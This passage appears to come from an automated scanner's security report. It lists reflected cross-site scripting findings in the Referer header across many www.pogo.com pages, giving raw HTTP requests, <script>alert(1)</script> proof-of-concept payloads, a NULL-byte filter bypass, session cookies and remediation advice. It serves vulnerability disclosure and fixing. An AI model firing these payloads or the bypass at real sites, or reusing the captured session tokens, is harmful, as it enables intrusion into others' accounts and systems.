Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=9f536</script><script>alert(1)</script>b87bcf0ce7f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0766</script><script>alert(1)</script>1623b3caefc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hotdeploy/us/promotions/swf/sidenav/club-promo/CLP_holidayPD_lftNav_alt2 HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=a0766</script><script>alert(1)</script>1623b3caefc
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da67</script><script>alert(1)</script>55025bf1a96 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/prize/en_US/cash-giveaway HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;
Referer: http://www.google.com/search?hl=en&q=5da67</script><script>alert(1)</script>55025bf1a96
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7abe6</script><script>alert(1)</script>b7c1c6fe8e2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login/entry.jsp?site=pogo&redr=http%3A%2F%2Fwww.pogo.com%2Ffbconnect%2Fjs.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=7abe6</script><script>alert(1)</script>b7c1c6fe8e2 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=DBFBE7E5DB27E8444071339BA4CA19A0.000195; com.pogo.unid=6606578824406775
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61995</script><script>alert(1)</script>fedd47ab6a7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login/pogo/setCookie.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=61995</script><script>alert(1)</script>fedd47ab6a7 Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536377459-New%7C1297128377459%3B; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a239f</script><script>alert(1)</script>d5873489ea2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /login/word-verification.jsp HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=a239f</script><script>alert(1)</script>d5873489ea2 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: com.pogo.site=pogo; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_pers=%20s_nr%3D1294536335943-New%7C1297128335943%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7e2</script><script>alert(1)</script>a2f2ba94e0d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/us/latestnews/news-2010.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=bb7e2</script><script>alert(1)</script>a2f2ba94e0d
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83883</script>fce9da87ffa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/us/netiquette/net-2009.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=83883</script>fce9da87ffa
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89060</script><script>alert(1)</script>e8717c673a3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/us/winnerscircle/winners-2010.jsp?pageSection=free_home_news#top HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=89060</script><script>alert(1)</script>e8717c673a3
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 984d2</script>6545c68478a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /prize/prize.do HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: 984d2</script>6545c68478a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93d27</script><script>alert(1)</script>4687fc424ef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /prize/prize.do?pageSection=header_prizes HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=93d27</script><script>alert(1)</script>4687fc424ef Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_cc=true; s_sq=%5B%5BB%5D%5D
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf0b3</script><script>alert(1)</script>08734cd08f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /prize/rules.do HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: cf0b3</script><script>alert(1)</script>08734cd08f
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %006a5b9</script><a>ed740adce0b was submitted in the Referer HTTP header. This input was echoed as 6a5b9</script><a>ed740adce0b in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /profiles/k7240 HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: http://www.google.com/search?hl=en&q=%006a5b9</script><a>ed740adce0b
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38e38</script><script>alert(1)</script>9e879b8cc05 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /puzzle-games?pageSection=categorybar_puzzle HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536563456-New%7C1297128563456%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=; Referer: 38e38</script><script>alert(1)</script>9e879b8cc05
